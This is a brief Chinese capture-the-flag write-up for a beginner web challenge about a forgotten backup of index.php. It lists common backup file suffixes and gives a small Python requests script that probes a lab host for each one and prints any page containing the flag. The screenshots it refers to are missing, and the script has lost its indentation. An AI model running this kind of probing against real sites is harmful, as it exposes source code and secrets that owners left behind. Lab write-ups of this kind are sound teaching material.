题目: 老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧!
打开页面得:
很容易想到,这里要找index.php的备份文件。
web网页常见的备份文件后缀名:“.git”,“.svn”,“.swp”,“.~”,“.bak”,“.bash_history”,“.bkf”
一个一个尝试太过麻烦,这里写了一个python小脚本:
import requests
txt=[".git",".svn",".swp",".~",".bak",".bash_history",".bkf"]
url="http://111.200.241.244:58222/index.php"
for i in txt:
url_end=url+i
html=requests.get(url=url_end)
if "flag" in html.text:
print(html.url)
print(html.text)
运行可得:
提交,结束。